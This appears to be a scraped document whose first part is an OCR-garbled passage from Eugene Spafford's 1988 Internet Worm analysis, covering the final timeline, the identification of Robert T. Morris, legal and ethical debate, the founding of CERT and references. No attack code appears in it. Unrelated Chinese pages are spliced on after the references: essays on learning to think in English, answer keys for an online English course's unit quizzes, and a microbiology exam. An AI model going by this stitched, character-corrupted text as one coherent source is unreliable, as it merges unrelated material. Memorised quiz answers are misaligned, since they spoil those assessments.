2130Group at Berkeley begins decompiling Worm into C code.(Seeley)

November4,1988

0050Bill Sommer?eld mails out description of?ngerd attack.He also makes?rst comments about the coding style of the Worm’s author.(mail)

0500MIT group?nishes code decompilation.(mail,NCSC)

0900Berkeley group?nishes code decompilation.(mail,NCSC,Seeley)

1100Milnet-Arpanet mailbridges restored.(NCSC)

1420Keith Bostic reposts?x to?ngerd.(mail)

1536Ted Ts’o of MIT posts clari?cation of how Worm operates.(mail)

1720Keith Bostic posts?nal set of patches for sendmail and?ngerd.Included is humorous set of ?xes to bugs in the decompiled Worm source code.(mail)

2130John Markhoff of the New York Times tells me in a phone conversation that he has identi?ed the author of the Worm and con?rmed it with at least two independent sources.

The next morning’s paper will identify the author as Robert T.Morris,son of the National

Computer Security Center’s chief scientist,Robert Morris.[18]

November5,1988

0147Mailing is made to phage mailing list by Erik Fair of Apple claiming he had heard that Robert Morse(sic)was the author of the Worm and that its release was an accident.(mail)

This news was relayed though various mail messages and appears to have originated with

John Markhoff.

1632Andy Sudduth acknowledges authorship of anonymous warning to TCP-IP mailing list.

(mail)

By Tuesday,November8,most machines had connected back to the Internet and traf?c patterns had returned to near normal.That morning,about50people from around the country met with of?cials of the National Computer Security Center at a hastily convened‘‘post-mortem’’on the Worm.They identify some likely future courses of action.[1]

Network traf?c analyzers continued to record infection attempts from(apparently)Worm programs still running on Internet machines.The last such instance occurred in the early part of December.*

5.Aftermath

In the weeks and months following the release of the Internet Worm,there have been a few topics hotly debated in mailing lists,media coverage,and personal conversations.I view a few of these as par-ticularly signi?cant,and will present them here.

5.1.Author,Intent,and Punishment

Two of the?rst questions to be asked—even before the Worm was stopped—were simply the ques-tions"Who?"and"Why?".Who had written the Worm,and why had he/she/they loosed it in the Inter-net?The question of"Who?"was answered shortly thereafter when the New York Times identi?ed Robert T.Morris.Although he has not publicly admitted authorship,and no court of law has yet pro-nounced guilt,there seems to be a large body of evidence to support such an identi?cation.Various

*Private communication,NCSC staff member.

Federal of?cials?have told me that they have obtained statements from multiple individuals to whom Mr. Morris spoke about the Worm and its development.They also claim to have records from Cornell University computers showing early versions of the Worm code being tested on campus machines,and they claim to have copies of the Worm code,found in Mr.Morris’s account.The report from the Provost’s of?ce at Cornell[11]also names Robert T.Morris as the culprit,and presents convincing rea-sons for that conclusion.

Thus,the identity of the author appears well established,but his motive remains a mystery.Con-jectures have ranged from an experiment gone awry to a subconscious act of revenge against his father. All of this is sheer speculation,however,since no statement has been forthcoming from Mr.Morris.All we have to work with is the decompiled code for the program and our understanding of its effects.It is impossible to intuit the real motive from those or from various individuals’experiences with the author. We must await a de?nitive statement by the author to answer the question‘‘Why?’’.Considering the potential legal consequences,both criminal and civil,a de?nitive statement from Mr.Morris may be some time in coming,if it ever does.

Two things have been noted by many people who have read the decompiled code,however(this author included).First,the Worm program contained no code that would explicitly cause damage to any system on which it ran.Considering the ability and knowledge evidenced by the code,it would have been a simple matter for the author to have included such commands if that was his intent.Unless the Worm was released prematurely,it appears that the author’s intent did not involve explicit,immediate destruction or damage of any data or systems.

The second feature of note was that the code had no mechanism to halt the spread of the Worm. Once started,the Worm would propagate while also taking steps to avoid identi?cation and‘‘capture.’’Due to this and the complex argument string necessary to start it,individuals who have examined the code(this author included)believe it unlikely that the Worm was started by accident or was intended not to propagate widely.

In light of our lack of de?nitive information,it is puzzling to note attempts to defend Mr.Morris by claiming that his intent was to demonstrate something about Internet security,or that he was trying a harmless experiment.Even the current president of the ACM implied that it was just a‘‘prank’’in[17]. It is curious that this many people,journalists and computer professionals alike,would assume to know the intent of the author based on the observed behavior of the program.As Rick Adams of the Center for Seismic Studies observed in a posting to the Usenet,we may someday hear that the Worm was actually written to impress Jodie Foster—we simply do not know the real reason.

The Provost’s report from Cornell,however,does not attempt to excuse Mr.Morris’s behavior.It quite clearly labels the actions as unethical and contrary to the standards of the computer profession. They very clearly state that his actions were against university policy and accepted practice,and that based on his past experience he should have known it was wrong to act as he did.

Coupled with the tendency to assume motive,we have observed different opinions on the punish-ment,if any,to mete out to the author.One oft-expressed opinion,especially by those individuals who believe the Worm release to be an accident or an unfortunate experiment,is that the author should not be punished.Some have gone so far as to say that the author should be rewarded and the vendors and operators of the affected machines should be the ones punished,this on the theory that they were sloppy about their security and somehow invited the abuse!The other extreme school of thought holds that the author should be severely punished,including at least a term in a Federal penitentiary.One somewhat humorous example of this was espoused by Mike Royko[23].

The Cornell commission recommended some punishment,but not punishment so severe that Mr. Morris’s future career in computing would be jepordized.Consistent with that recommendation,Robert has been suspended from the University for a minimum of one year;the faculty of the computer science department there will have to approve readmission should he apply for it.

?Personal conversations,anonymous by request.

As has been observed in both[16] and[8],it would not serve us well to overreact to this particular incident;less than5%of the machines on an insecure network were affected for less than a few days. However,neither should we dismiss it as something of no consequence.That no damage was done may possibly have been an accident,and it is possible that the author intended for the program to clog the Internet as it did(comments in his code,as reported in the Cornell report,suggested even more sinister possibilities).Furthermore,we should be careful of setting a dangerous precedent for future occurrences of such behavior.Excusing acts of computer vandalism simply because their authors claim there was no intent to cause damage will do little to discourage repeat offenses,and may encourage new incidents.

The claim that the victims of the Worm were somehow responsible for the invasion of their machines is also curious.The individuals making this claim seem to be stating that there is some moral or legal obligation for computer users to track and install every conceivable security?x and mechanism available.This totally ignores the many sites that run turn-key systems without source code or adminis-trators knowledgeable enough to modify their systems.Those sites may also be running specialized software or have restricted budgets that prevent them from installing new software versions.Many com-mercial and government sites operate their systems this way.To attempt to blame these individuals for the success of the Worm is equivalent to blaming an arson victim for the?re because she didn’t build her house of?reproof metal.(More on this theme can be found in[27].)

The matter of appropriate punishment will likely be decided by a Federal judge.A grand jury in Syracuse,NY has been hearing testimony on the matter.A Federal indictment under the United States Code,Title18§1030(the Computer Fraud and Abuse statute),parts(a)(3)or(a)(5)might be returned.§(a)(5),in particular,is of interest.That part of the statute makes it a felony if an individual‘‘intention-ally accesses a Federal interest computer without authorization,and by means of one or more instances of such conduct alters,damages,or destroys information...,or prevents authorized use of any such com-puter or information and thereby causes loss to one or more others of a value aggregating$1,000or more during any one year period;’’(emphasis mine).The penalty if convicted under section(a)(5)may include a?ne and a?ve year prison term.State and civil suits might also be brought in this case.

5.2.Worm Hunters

A signi?cant conclusions reached at the NCSC post-mortem workshop was that the reason the Worm was stopped so quickly was due almost solely to the U NIX‘‘old-boy’’network,and not because of any formal mechanism in place at the time.[1]A general recommendation from that workshop was that a formal crisis center be established to deal with future incidents and to provide a formal point of contact for individuals wishing to report problems.No such center was established at that time.

On November29,someone exploiting a security?aw present in older versions of the FTP?le transfer program broke into a machine on the MILnet.The intruder was traced to a machine on the Arpanet,and to prevent further access the MILnet/Arpanet links were immediately severed.During the next48hours there was considerable confusion and rumor about the disconnection,fueled in part by the Defense Communication Agency’s attempt to explain the disconnection as a‘‘test’’rather than as a secu-rity problem.

This event,coming as close as it did to the Worm incident,prompted DARPA to establish the CERT—the Computer Emergency Response Team—at the Software Engineering Institute at Carnegie-Mellon University.*The purpose of the CERT is to act as a central switchboard and coordinator for com-puter security emergencies on Arpanet and MILnet computers.The Center has asked for volunteers from Federal agencies and funded laboratories to serve as technical advisors when needed.[2] Of interest here is that the CERT is not chartered to deal with just any Internet emergency.Thus, problems detected in the CSnet,Bitnet,NSFnet,and other Internet communities may not be referable to the CERT.I was told it is the hope of CERT personnel that these other networks will develop their own CERT-like groups.This,of course,may make it dif?cult to coordinate effective action and communica-tion during the next threat.It may even introduce rivalry in the development and dissemination of critical information.The effectiveness of this organization against the next Internet-wide crisis will be interesting

*Personal communication,M.Poepping of the CERT.

to note.

6.Concluding Remarks

Not all the consequences of the Internet Worm incident are yet known;they may never be.Most likely there will be changes in security consciousness for at least a short while.There may also be new laws,and new regulations from the agencies governing access to the Internet.Vendors may change the way they test and market their products—and not all the possible changes may be advantageous to the end-user(e.g.,removing the machine/host equivalence feature for remote execution).Users’interactions with their systems may change based on a heightened awareness of security risks.It is also possible that no signi?cant change will occur anywhere.The?nal bene?t or harm of the incident will only become clear with the passage of time.

It is important to note that the nature of both the Internet and U NIX helped to defeat the Worm as well as spread it.The immediacy of communication,the ability to copy source and binary?les from machine to machine,and the widespread availability of both source and expertise allowed personnel throughout the country to work together to solve the infection,even despite the widespread disconnection of parts of the network.Although the immediate reaction of some people might be to restrict communica-tion or promote a diversity of incompatible software options to prevent a recurrence of a Worm,that would be an inappropriate reaction.Increasing the obstacles to open communication or decreasing the number of people with access to in-depth information will not prevent a determined attacker—it will only decrease the pool of expertise and resources available to?ght such an attack.Further,such an attitude would be contrary to the whole purpose of having an open,research-oriented network.The Worm was caused by a breakdown of ethics as well as lapses in security—a purely technological attempt at preven-tion will not address the full problem,and may just cause new dif?culties.

What we learn from this about securing our systems will help determine if this is the only such incident we ever need to analyze.This attack should also point out that we need a better mechanism in place to coordinate information about security?aws and attacks.The response to this incident was largely ad hoc,and resulted in both duplication of effort and a failure to disseminate valuable information to sites that needed it.Many site administrators discovered the problem from reading the newspaper or watching the television.The major sources of information for many of the sites affected seems to have been Usenet news groups and a mailing list I put together when the Worm was?rst discovered. Although useful,these methods did not ensure timely,widespread dissemination of useful information—especially since many of them depended on the Internet to work!Over three weeks after this incident some sites were still not reconnected to the Internet because of doubts about the security of their systems. The Worm has shown us that we are all affected by events in our shared environment,and we need to develop better information methods outside the network before the next crisis.The formation of the CERT may be a step in the right direction,but a more general solution is still needed.

Finally,this whole episode should cause us to think about the ethics and laws concerning access to computers.Since the technology we use has developed so quickly,it is not always simple to determine where the proper boundaries of moral action may be.Some senior computer professionals may have started their careers years ago by breaking into computer systems at their colleges and places of employ-ment to demonstrate their expertise and knowledge of the inner workings of the systems.However,times have changed and mastery of computer science and computer engineering now involves a great deal more than can be shown by using intimate knowledge of the?aws in a particular operating system.Whether such actions were appropriate?fteen years ago is,in some senses,unimportant.I believe it is critical to realize that such behavior is clearly inappropriate now.Entire businesses are now dependent,wisely or not,on computer systems.People’s money,careers,and possibly even their lives may be dependent on the undisturbed functioning of computers.As a society,we cannot afford the consequences of condoning or encouraging reckless or ill-considered behavior that threatens or damages computer systems,especially by individuals who do not understand the consequences of their actions.As professionals,computer scientists and computer engineers cannot afford to tolerate the romanticization of computer vandals and computer criminals,and we must take the lead by setting proper examples.Let us hope there are no further incidents to underscore this particular lesson.

Acknowledgements

Early versions of this paper were carefully read and commented on by Keith Bostic,Steve Bello-vin,Kathleen Heaphy,and Thomas Narten.I am grateful for their suggestions and criticisms. References

1.Participants,P ROCEEDINGS O F T HE V IRUS P OST-M ORTEM M EETING,National Computer Security

Center,Ft.George Meade,MD,8November1988.

2.Staff,‘‘Uncle Sam’s Anti-Virus Corps,’’U NIX T ODAY!,p.10,Jan23,1989.

3.Allman,Eric,Sendmail—An Internetwork Mail Router,University of California,Berkeley,1983.

Issued with the BSD U NIX documentation set.

4.Bishop,Matt,‘‘An Application of a Fast Data Encryption Standard Implementation,’’C OMPUTING

S YSTEMS:T HE J OURNAL O F T HE U SENIX A SSOCIATION,vol.1,no.3,pp.221-254,University of Cali-fornia Press,Summer1988.

5.Brunner,John,The Shockwave Rider,Harper&Row,1975.

6.Cohen,Fred,‘‘Computer Viruses:Theory and Experiments,’’P ROCEEDINGS O F T HE7T H N ATIONAL

C OMPUTER S ECURITY C ONFERENCE,pp.240-263,1984.

https://www.sodocs.net/doc/0413104873.html,er,Douglas E.,Internetworking with TCP/IP:Principles,Protocols and Architecture,Prentice

Hall,Englewood Cliffs,NJ,1988.

8.Denning,Peter,‘‘The Internet Worm,’’A MERICAN S CIENTIST,vol.77,no.2,March-April1989.

9.Denning,Peter J.,‘‘Computer Viruses,’’A MERICAN S CIENTIST,vol.76,pp.236-238,May-June

1988.

10.Eichin,Mark W.and Jon A.Rochlis,‘‘With Microscope and Tweezers:An Analysis of the Internet

Virus of November1988,’’P ROCEEDINGS O F T HE S YMPOSIUM O N R ESEARCH I N S ECURITY A ND P RIVACY,IEEE-CS,Oakland,CA,May1989.

11.Eisenberg,Ted,David Gries,Juris Hartmanis,Dan Holcomb,M.Stuart Lynn,and Thomas Santoro,

The Computer Worm,Of?ce of the Provost,Cornell University,Ithaca,NY,Feb.1989.

12.Gerrold,David,When Harlie Was One,Ballentine Books,1972.The?rst edition.

13.Grampp,Fred.T.and Robert H.Morris,‘‘U NIX Operating System Security,’’A T&T B ELL L ABORA-

TORIES T ECHNICAL J OURNAL,vol.63,no.8,part2,pp.1649-1672,Oct.1984.

14.Harrenstien,K.,‘‘Name/Finger,’’R FC742,SRI Network Information Center,December1977.

15.Hinden,R.,J.Haverty,and A.Sheltzer,‘‘The DARPA Internet:Interconnecting Heterogeneous

Computer Networks with Gateways,’’C OMPUTER M AGAZINE,vol.16,no.9,pp.38-48,IEEE-CS, September1983.

16.King,Kenneth M.,‘‘Overreaction to External Attacks on Computer Systems Could be More Harm-

ful than the Viruses Themselves,’’C HRONICLE O F H IGHER E DUCATION,p.A36,November23, 1988.

17.Kocher,Bryan,‘‘A Hygiene Lesson,’’C OMMUNICATIONS O F T HE A CM,vol.32,no.1,p.3,January

1989.

18.Markhoff,John,‘‘Author of Computer’Virus’Is Son of U.S.Electronic Security Expert,’’N EW

Y ORK T IMES,p.A1,November5,1988.

19.Morris,Robert and Ken Thompson,‘‘U NIX Password Security,’’C OMMUNICATIONS O F T HE A CM,

vol.22,no.11,pp.594-597,ACM,November1979.

20.Postel,Jonathan B.,‘‘Simple Mail Transfer Protocol,’’R FC821,SRI Network Information Center,

August1982.

21.Reid,Brian,‘‘Re?ections on Some Recent Widespread Computer Breakins,’’C OMMUNICATIONS O F

T HE A CM,vol.30,no.2,pp.103-105,ACM,February1987.

22.Ritchie,Dennis M.,‘‘On the Security of U NIX,’’in U NIX S UPPLEMENTARY D OCUMENTS,AT&T,

1979.

23.Royko,Mike,‘‘Here’s how to stop computer vandals,’’T HE C HICAGO T RIBUNE,November7,1988.

24.Seeley,Donn,‘‘A Tour of the Worm,’’P ROCEEDINGS O F1989W INTER U SENIX C ONFERENCE,

Usenix Association,San Diego,CA,February1989.

25.Shoch,John F.and Jon A.Hupp,‘‘The Worm Programs—Early Experience with a Distributed

Computation,’’C OMMUNICATIONS O F T HE A CM,vol.25,no.3,pp.172-180,ACM,March1982. 26.Spafford,Eugene H.,‘‘The Internet Worm Program:An Analysis,’’C OMPUTER C OMMUNICATION

R EVIEW,vol.19,no.1,ACM SIGCOM,January1989.Also issued as Purdue CS technical report TR-CSD-823

27.Spafford,Eugene H.,‘‘Some Musings on Ethics and Computer Break-Ins,’’P ROCEEDINGS O F T HE

W INTER U SENIX C ONFERENCE,Usenix Association,San Diego,CA,February1989.

28.Steiner,Jennifer,Clifford Neuman,and Jeffrey Schiller,‘‘Kerberos:An Authentication Service for

Open Network Systems,’’U SENIX A SSOCIATION W INTER C ONFERENCE1988P ROCEEDINGS,pp.191-202,February1988.

29.Stoll,Cliff,The Cuckoo’s Egg,Doubleday,NY,NY,October1989.Also published in Frankfurt,

Germany by Fischer-Verlag.

如何培养英语思维方式6页word文档

如何培养英语思维方式? 一、英语思维方式的培养应该从模仿开始。 “学习语言的主要手段是模仿,这种模仿是从听觉定向活动开始的,经过大脑分析器的作用,然后由心理活动器官的操练而完成的。”心理语言学家认为,语言是从听开始的,当一个婴儿生下来就学说话时,完全是靠听,模仿(imitate)母亲的声音。如果一个婴儿生下来就是一个聋子,他就听不到声音,也谈不上什么成功的模仿者。一个不足10岁的儿童,如果他一直生活在第一语言环境中,他就能学到一种漂亮的母语。如果想学好外语,必须下大功夫模仿,采取多种方式,利用一切机会进行模仿。埃克斯利(Eckersley,C.E.1974)说过,毫无疑问,模仿是成功的钥匙,也许是把金钥匙。(There is no doubt that imitation is one of the keys, perhaps the golden key ,to success.)有人认为模仿很简单,好学,其实不然。养成一个好的模仿习惯并不容易,这种模仿只有像学母语那样,方可学好。不下功夫,以为轻而易举可以模仿好外语语音是不可能的。 因此,要想学好外语就要在模仿上下功夫,因为外语语言能否学好,在很大程度上决定于听准外语老师发音的能力和学习者的模仿能力以及反复模仿的耐心。如果跟着外语老师念一遍,过后一劳永逸,那是学不好外语的。所以,一定要持之以恒地模仿、重复、练习。“听别人怎样说,就照样跟着说。”这是学习语言的必由之路。 二、英语思维模式的培养应该培养自己摆脱母语的影响,用英语想英语。 用英语想英语,指的是在使用英语时用英语想(think in English),而不是用本族语想。用英语想,也可以说成用英语思考。学英语而不学用

201X国开网人文英语3答案(单元自测2~8)

单元自测2 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读短文 子问题 1:A; 子问题 2:B; 子问题 3:B; 子问题 4:A; 子问题 5:C 单元自测3 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读理解:选择题 子问题 1:C; 子问题 2:C; 子问题 3:A; 子问题 4:B; 子问题 5:B 二、阅读理解:正误判断

子问题 1:F; 子问题 2:T; 子问题 3:T; 子问题 4:F; 子问题 5:F 单元自测4 题目为随机,用查找功能(Ctrl+F)搜索题目 二、英译汉 子问题 1:B; 子问题 2:A; 子问题 3:C; 子问题 4:B; 子问题 5:B 二、阅读理解:正误判断 子问题 1:F; 子问题 2:F; 子问题 3:T; 子问题 4:T; 子问题 5:T 单元自测5 题目为随机,用查找功能(Ctrl+F)搜索题目

二、翻译 子问题 1:B; 子问题 2:C; 子问题 3:A; 子问题 4:C; 子问题 5:A 单元自测6 题目为随机,用查找功能(Ctrl+F)搜索题目

二、阅读理解:选择题 子问题 1:D; 子问题 2:B; 子问题 3:E; 子问题 4:A; 子问题 5:C 二、阅读理解:正误判断 子问题 1:F; 子问题 2:F; 子问题 3:F; 子问题 4:T; 子问题 5:F 单元自测7 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读理解:判断题 子问题 1:F; 子问题 2:F; 子问题 3:T; 子问题 4:T; 子问题 5:F

二、阅读理解:选择题

英语思维方式的培养应该从模仿开始

上一篇下一篇 一、英语思维方式的培养应该从模仿开始 创建时间:2011年5月19日(星期四) 下午3:09 | 分类:未分类| 字数:3408 | 发送到我的Qzone | 另存为... | 打印 一、英语思维方式的培养应该从模仿开始。“学习语言的主要手段是模仿,这种模仿是从听觉定向活动开始的,经过大脑分析器的作用,然后由心理活动器官的操练而完成的。”心理语言学家认为,语言是从听开始的,当一个婴儿生下来就学说话时,完全是靠听,模仿(imitate)母亲的声音。如果一个婴儿生下来就是一个聋子,他就听不到声音,也谈不上什么成功的模仿者。一个不足10岁的儿童,如果他一直生活在第一语言环境中,他就能学到一种漂亮的母语。如果想学好外语,必须下大功夫模仿,采取多种方式,利用一切机会进行模仿。埃克斯利(Eckersley,C.E.1974)说过,毫无疑问,模仿是成功的钥匙,也许是把金钥匙。(There is no doubt that imitation is one of the keys, perhaps the golden key ,to success.)有人认为模仿很简单,好学,其实不然。养成一个好的模仿习惯并不容易,这种模仿只有像学母语那样,方可学好。不下功夫,以为轻而易举可以模仿好外语语音是不可能的。因此,要想学好外语就要在模仿上下功夫,因为外语语言能否学好,在很大程度上决定于听准外语老师发音的能力和学习者的模仿能力以及反复模仿的耐心。如果跟着外语老师念一遍,过后一劳永逸,那是学不好外语的。所以,一定要持之以恒地模仿、重复、练习。“听别人怎样说,就照样跟着说。”这是学习语言的必由之路。二、英语思维模式的培养应该培养自己摆脱母语的影响,用英语想英语。用英语想英语,指的是在使用英语时用英语想(think in English),而不是用本族语想。用英语想,也可以说成用英语思考。学英语而不学用英语思考,一定学不好。用英语思考,就是在使用英语进行表达和理解时,没有本族语思考的介入,没有“心译”的介入,或者说本族语思考的介入被压缩到了极不明显的程度,自己也感觉不到“心译”的负担。这才是真正流利,熟练的境界和标志。用英语思考并不神秘,也非高不可攀。初学时,“心译”的介入很明显,但时间一长,反复运用的次数越来越多,“心译”的程度就会越来越小,以至接近于消失。可见,培养英语思考的基本途径是系统的大量的反复使用,是实践练习。语言是工具。使用任何工具都有一个从不熟练到熟练的过程,在不熟练的阶段,多余的动作很明显,总要一边做一边考虑。初学者使用外语时,“心译”就是这种多余的活动,是一边用一边考虑的表现。这里所说的考虑实际上是在大脑里进行的对将要表现出来的外部活动的一种检验。用本族语交际时,也有考虑考虑再说的情况,可以说是在心里把原来要说的话转成或翻译为另外一些说法进行掂量。但由于习以为常,所以不会给人造成负担和精神紧张。而在用英语交际时,由于怕错,所以想了又想,而由于英语不熟,语汇不多,所以就求助于本族语,产生“心译”。因此,培养用英语思考,消除“心译”,主要消除学生怕错的紧张心理。学习英语、使用英语都要用思想。思想要有逻辑性。逻辑指思维的规律性。思想的逻辑性,条理性在很大程度上取决于人的大脑对客观事物反映的系统性和所掌握语言的系统程度。语言问题与逻辑问题是密切联系的。学生使用英语进行表达或理解别人用英语表达的思想时,所遇到的困难虽然表现为语言上的困难,但实质上有相当一部分,或在相当程度上乃是逻辑上的困难。表达不好,常常是思路不清,理解不好,则常常是推理能力差。因此,为了培养用英语思考,就要加强英语练习的逻辑性,注意按照英语所反映的客观事物的多种联系,从性质、属性、层次、因果等各方面的关系,对练习的形式和内容进行组织,训练学生成套地表达和理解,形成以英语为外壳的思维定势,相应的英语材料则以连锁反应的方式在大脑里源源不断地涌现。摆脱母语影响的教育,用英语想英语应表现课堂上的每一分钟。(一)营造良好的思维环境,激活学生学习思维。1.融洽师生关系,激发用英语思考的兴趣。2.培养学生的独立学习能力,让他们有更多的用英语想英语,独立思维的时间和空间。3.给予成功的机会,增强学习情趣,激发用英语思维。(二)创造生动的语言氛围,提高学生的学习积极性。1.用英语授课,坚持用英语和学生交流,给学生创造语言环境,挖掘教材本身的情趣,

微生物学考试题(1)

微生物学考试题 A卷(2014-1-16) 一、名词解释(20分,每小题4分) 1.革兰氏阳性菌(G+)和革兰氏阴性菌(G-) 2.病毒和朊病毒 3.同型乳酸发酵和异型乳酸发酵 4.F质粒和Ti质粒 5.单克隆抗体和多克隆抗体 二、判断正误(正确的请在括号内划√,错误的请在括号内划×)(10分,每小题1分) ()1.德国著名科学家罗伯特·科赫巧妙地用曲颈瓶试验证明细菌污染是导致食品腐败的根本原因,提出了有名的“胚种学说”或“生源论”,从而标志着微生物学学科的建立。科赫被誉为“微生物学之父”。 ()2.原核微生物包括细菌、放线菌、蓝细菌、枝原体、立克次氏体和衣原体及真菌等7类。 ()3.G+细菌细胞壁的特点是其肽聚糖层厚,而G-细菌细胞壁的特点是肽聚糖层薄或为单层。 ()4.真菌产生的有性孢子类型有卵孢子、接合孢子、子囊孢子和担孢子。 ()5.除原生动物可通过胞吞作用和胞饮作用摄取营养物质外,其他各大类有细胞的微生物都是通过细胞膜的渗透和选择作用而从外界吸收营养物质。

()6.反硝化作用是指好氧微生物利用硝酸盐作为呼吸链的最终氢受体,将其还成亚硝酸、NO、N2O直至N2的过程。 ()7.生物固氮是指大气中的分子氮通过微生物固氮酶的催化而还原成氨的过程,原核生物和真核生物都具有固氮能力。 ()8.干热灭菌法和湿热灭菌法是实验室中常用的高温灭菌方法,这两种方法都可用于金属器械、玻璃器皿及各种培养基的灭菌。 ()9.富营养化是指水体中因氮、磷等元素含量过高而导致水体表层蓝细菌和酵母菌过度生长繁殖的现象。 ()10.《伯杰氏系统细菌学手册》(Bergey’s Manual of Systematic Bacteriology)和《真菌词典》(The Dictionary of Fungi)是微生物分类学者的常用工具书。 三、填空(请在划线上填上正确答案)(15分,每空0.5分) 1.放线菌是一类呈生长、以繁殖、 生性较强的高级原核生物。 2.真核微生物包括、和 。 3.按对培养基成分的了解情况,可将培养基分成、 和三种类型的培养基。 4.对化能异养微生物而言,葡萄糖等能源物质可通过

从英汉思维差异看英语写作的培育模式

从英汉思维差异看英语写作的培育模式 摘要汉语式表达一直以来是困扰学生英语写作的一大难题。然而,在传统的语言教学中,由于教师过分强调语言的准确性,词汇的积累量和语法规则,学生虽能写出基本句型,但实际有效的句子写作不尽如人意。如何在写作过程中避免出现汉语式表达,培养学生写出正确而有效的英语句子,本文从英汉思维差异粗浅地探讨学生英语写作的培养基本模式。 关键词翻译适应选择论中医术语英译 中图分类号:H315 文献标识码:A 1英语写作中的中式表达 中国学生在写英语作文时,受汉语表达习惯的影响,很容易写出汉语化的英语。这是因为,在写作过程中,学生的头脑往往先呈现的是中文符号,之后将其不假思索地转换为英文,虽然有时符合语法规则,不影响理解,但是,在表达方式上与标准的英语习惯不符,从而影响语言的地道性。例如,表达中文“有”这一概念时,有这样的句子“The chief reason for the change have five points.”就属于汉式词汇在英语表达中的的生搬硬套。此外,常见的中式表达错误还有汉式的无主语句,英汉语序机械式对等,汉式的多动词连用等,如“People think go to a movie will cost

a lot of money”出现谓语动词使用混乱的表达,不妨将其改为“People think going to a movie will cost a lot of money”,这样句子的层次才更明显;再比如“Watching TV is convenient and won’t suffer from traffic jams”句中,逻辑主语跟后半句的谓语搭配不当;还有一些习惯表达及搭配的误用,如接电话很容易被误写为“receive the phone”……究其原因,是学生不注意英汉两种语言和文化背景的差异导致的错误。 2英汉思维差异 英文写作和中文写作其实是不同的东西方语篇思维模式的体现。西方人的思维方式以逻辑和直线性为特点,在遣词造句谋篇上遵循着从一般(genera1)到具体(specific),从概括(summarize)到举例(exemplify),从整体(whole)到个体(respective)的原则,即单刀直入先表达主要思想,然后对其加以说明或论证,一旦一点被论证结束,就不应该再回过头来重复讨论,因此语段展开的过程中,每个句子、每个段落都自然连贯,具有一种行云流水般的流动感;而东方人的思维方式以直觉的整体性与和谐的辨证性著称,是螺旋式思维模式,有种文章之妙,无过婉转曲折和只可意会不可言传的感觉,即对于所要表达的主题可以洋洋洒洒,下笔千言,给人形散而神聚的感官享受。从语言组织方式上又可以分为以句法和词汇为衔接手段的形

《人文英语3》形考任务(国开大学试卷答案)

人文英语3 资料搜索操作方式: 键盘同时按“Ctrl + F”查找关键字搜索,显示界面如下: 温馨提示: 由于本科目是随机题目,如ctrl+F无法查询到,请借助百度搜索或翻译软件 ①百度搜索:将题目复制到百度搜索,进行查询。 ②翻译软件:使用截图、拍照翻译题目或复制全篇文章-根据译意代入正确选项,完成答题。 (建议使用火狐浏览器或者360极速浏览器完成作业) 单元自测1 题目1 — Hello, may I speak to Henry? — _______ A. My name is Henry. B. This is Henry speaking. C. It is Henry.

答案:This is Henry speaking. 题目2 — What's your major please? — _______ A. I'm majoring in Interior Design B. I'm not sure C. Who knows 答案:I'm majoring in Interior Design 题目3 There are ______ students in Class One than in Class Two. A. most B. many C. more 答案:more 题目4 You don't have to start over from ______. A. head B. again C. scratch 答案:scratch 题目5 The _____ question is much more different than this one. A. six B. sixteen C. sixth 答案:sixth 题目6 获得50.00分中的0.00分 二、完形填空:阅读下面的短文,选择合适的内容将短文补充完整。 Top 3 Green Home Innovations() There are many things you can do to reduce carbon emission and help to make the earth a better place for future generations. Here are a few suggestions. ()Although LED lamps cost more money than standard incandescent or compact fluorescent bulbs do at the beginning, these long-lasting LED lamps will eventually be worth the money because of nergy saved. LED lamps also produce a cleaner, more natural light.()“Water”is a hot topic, especially in the Southwest. Household water filters are now available to clean and reuse water from showers and baths. Gray water reuse systems redirect the used water from washing machines to lawns or gardens.()() Building materials and embellishments like paint and carpets can emit chemical compounds into the atmosphere, and because a home is an enclosed space, those compounds can sometimes accumulate to dangerous levels. Installing a whole-house air purification system is one way to

国开大学人文英语3答案(单元自测1-8)

单元自测1 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读短文 子问题1:C; 子问题2:B; 子问题3:C; 子问题4:B; 子问题5:A 三、阅读理解:正误判断 子问题1:F; 子问题2:T; 子问题3:T; 子问题4:T; 子问题5:F

单元自测2 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读短文 子问题1:A; 子问题2:B; 子问题3:B; 子问题4:A; 子问题5:C 单元自测3 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读理解:选择题 子问题1:C; 子问题2:C; 子问题3:A; 子问题4:B; 子问题5:B 二、阅读理解:正误判断 子问题1:F; 子问题2:T; 子问题3:T; 子问题4:F; 子问题5:F

单元自测4 题目为随机,用查找功能(Ctrl+F)搜索题目 二、英译汉 子问题1:B; 子问题2:A; 子问题3:C; 子问题4:B; 子问题5:B 二、阅读理解:正误判断 子问题1:F; 子问题2:F; 子问题3:T; 子问题4:T; 子问题5:T 单元自测5 题目为随机,用查找功能(Ctrl+F)搜索题目

二、翻译 子问题1:B; 子问题2:C; 子问题3:A; 子问题4:C; 子问题5:A 单元自测6 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读理解:选择题 子问题1:D; 子问题2:B; 子问题3:E; 子问题4:A; 子问题5:C 二、阅读理解:正误判断 子问题1:F; 子问题2:F; 子问题3:F; 子问题4:T; 子问题5:F

单元自测7 题目为随机,用查找功能(Ctrl+F)搜索题目 二、阅读理解:判断题 子问题1:F; 子问题2:F; 子问题3:T; 子问题4:T; 子问题5:F 二、阅读理解:选择题 子问题1:A; 子问题2:C; 子问题3:B; 子问题4:A; 子问题5:C 单元自测8 题目为随机,用查找功能(Ctrl+F)搜索题目

学好英语重在英语思维方式的培养

学好英语重在英语思维方式的培养 学好英语重在英语思维的培养。直接用英语思考将有助于你在英语交流的过程中更快地回应对方,说英语的时候也更加流利,同时,还会减少词汇错误问题的出现机率。 那么,正确的英语思维模式应该是怎样的呢?如下图所示: 可能有些同学会反映:“老师,我的词汇量很少,英语水平不怎么样,操作起来比较难啊!” 即使你是英语初学者,按照以下几个步骤,英语思考模式的培养就会慢慢形成!小伙伴们,让我们一起努力吧! 首先,单词联想 例如在家时我们可以主动联想以下这些单词:door、book、read、tale、 chair、sofa、go、window、kitchen、bedroom等等,去学校时又可以联想到teacher、student、notebook、pen、friend、class、pencil、blackboard、lesson等等。大家千万不能小看这些单词,不信,那麻烦你们打开自己的包包看一看,所有物品的名称都能够用英语表达出来吗?

